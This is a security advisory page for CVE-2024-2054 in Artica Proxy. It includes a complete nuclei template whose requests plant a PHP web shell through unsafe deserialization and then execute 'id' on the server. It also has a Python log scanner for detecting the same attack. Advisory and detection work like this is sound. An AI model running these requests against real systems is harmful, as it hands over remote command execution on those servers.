Artica Proxy - Remote Code Execution

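Vulnerability Information

Vulnerability name: Artica Proxy - Remote Code Execution

Vulnerability ID:

  • CVE: CVE-2024-2054

Vulnerability type: Command execution

Severity: Critical

Description: Artica Proxy is widely used proxy server software, deployed mainly in enterprise network environments, where it provides network traffic management and security protection. Because of its efficient performance and ease of use, it is widely used across many industries. The remote code execution vulnerability (CVE-2024-2054) allows an attacker to execute arbitrary commands on the server by exploiting a specific endpoint, which may lead to full control of the system. The technical root cause is that the software fails to handle user input correctly, so an attacker can craft malicious requests that bypass security restrictions and execute unauthorized code. The vulnerability can be exploited remotely without any form of authentication, which greatly increases the security risk. An attacker who successfully exploits it can take full control of the affected system and carry out malicious operations such as data theft and service disruption, posing a serious threat to the network security of enterprises and organizations. All users of Artica Proxy are therefore advised to update to the latest version immediately to fix this vulnerability.

Vendor: articatech

Product: artica_proxy

Affected version: 4.50

Source: https://github.com/projectdiscovery/nuclei-templates/blob/b5def12c15968859278c86990b15e11cad2ada7c/http%2Fcves%2F2024%2FCVE-2024-2054.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details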

id: CVE-2024-2054

info:
  name: Artica Proxy - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    This template targets a remote code execution vulnerability in Artica Proxy by exploiting a specific endpoint.
  impact: |
    Successful exploitation allows attackers to execute arbitrary commands on the server, potentially leading to full system compromise.
  remediation: |
    Update Artica Proxy to the latest version that addresses this vulnerability and implement proper input validation.
  reference:
    - https://github.com/0xMarcio/cve/blob/main/2024/CVE-2024-2054.md
    - https://github.com/Madan301/CVE-2024-2054/blob/main/CVE-2024-2054.py
    - https://github.com/tanjiti/sec_profile
    - https://github.com/Madan301/CVE-2024-2054
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2054
    cwe-id: CWE-502
    epss-score: 0.79565
    epss-percentile: 0.99025
    cpe: cpe:2.3:a:articatech:artica_proxy:4.50:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: articatech
    product: artica_proxy
  tags: cve,cve2024,rce,artica,intrusive

variables:
  websh: '<?php system($_GET["cmd"]);?>'
  payload: '{{base64(websh)}}'


http:
  - raw:
      - |
        GET /wizard/wiz.upload.php HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wizard/wiz.wizard.progress.php?build-js=%7B'TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI':%20%7B'cache_file':%20'/usr/share/artica-postfix/wizard/meow.upload.php',%20'cache_serializer':%20'json',%20'cache_size':%20999999999,%20'cache_data':%20%7B'{{payload}}+':%20%7B'cache_date':%200,%20'ttl':%20999999999%7D%7D%7D%7D HTTP/1.1
        Host: {{Hostname}}
        User-Agent: python-requests/2.32.3

      - |
        GET /wizard/wiz.upload.php?cmd=id HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "wiz.wizard.progress.php"

      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
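A detection check for the request pattern in the template above, added here as an example (it is not part of the original page or of the nuclei-templates project): it scans web access log lines for requests to `/wizard/wiz.wizard.progress.php` whose `build-js` parameter carries a base64-encoded PHP serialized-object header, the CWE-502 marker the template relies on. The combined log format, the function names and the sample lines are assumptions constructed for the example.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs

ENDPOINT = "/wizard/wiz.wizard.progress.php"   # endpoint from the template
PARAM = "build-js"                              # parameter from the template
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}")
PHP_OBJECT = re.compile(rb'O:\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)"')

def serialized_classes(value):
    """Decode base64 runs in a parameter value; return PHP class names
    from any serialized-object header (O:<len>:"<Class>") found inside."""
    names = []
    for run in B64_RUN.findall(value):
        try:
            decoded = base64.b64decode(run + "=" * (-len(run) % 4))
        except ValueError:          # not valid base64, ignore this run
            continue
        names += [m.decode() for m in PHP_OBJECT.findall(decoded)]
    return names

def scan(lines):
    """Return (line_no, client, [class names]) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != ENDPOINT:
            continue
        for value in parse_qs(url.query).get(PARAM, []):
            classes = serialized_classes(value)
            if classes:
                hits.append((n, line.split()[0], classes))
    return hits

# Constructed sample log lines (documentation addresses, shortened query).
SAMPLE = [
    '192.0.2.10 - - [31/Jul/2025:10:00:01 +0000] "GET /wizard/wiz.wizard.progress.php?build-js=ok HTTP/1.1" 200 12',
    "198.51.100.7 - - [31/Jul/2025:10:00:05 +0000] \"GET /wizard/wiz.wizard.progress.php?build-js=%7B'TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI':%20%7B%7D%7D HTTP/1.1\" 200 40",
    '192.0.2.10 - - [31/Jul/2025:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit on this endpoint warrants checking the wizard directory for recently created `.php` files and reviewing later requests from the same client.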



Author: lianccc
Published: July 31, 2025